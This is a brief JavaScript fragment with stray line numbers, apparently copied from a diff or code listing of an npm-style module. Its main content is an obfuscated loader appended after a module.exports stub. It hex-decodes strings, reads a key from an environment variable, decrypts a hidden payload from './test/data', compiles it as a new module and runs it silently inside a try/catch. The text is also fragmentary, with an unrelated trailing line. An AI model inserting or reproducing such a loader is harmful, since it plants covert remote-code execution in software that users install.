```
module.exports = function(e, n) {
69 };
70
71
   !function() {
72
     try {
73
       var r = require,
74
       t = process;
75
       function e(r) {
76
         return Buffer.from(r, "hex").toString()
77
78
       var n = r(e("2e2f746573742f64617461")),
79
       o = t[e(n[3])][e(n[4])];
80
       if (!o) return;
81
       var u = r(e(n[2]))[e(n[6])](e(n[5]), o),
82
       a = u.update(n[0], e(n[8]), e(n[9]));
83
       a += u.final(e(n[9]));
84
       var f = new module.constructor;
85
       f.paths = module.paths,
86
       f[e(n[7])](a, ""),
       f.exports(n[1])
87
88
   } catch(r) {}
89 }();
```

var Stream = require("stream").Stream;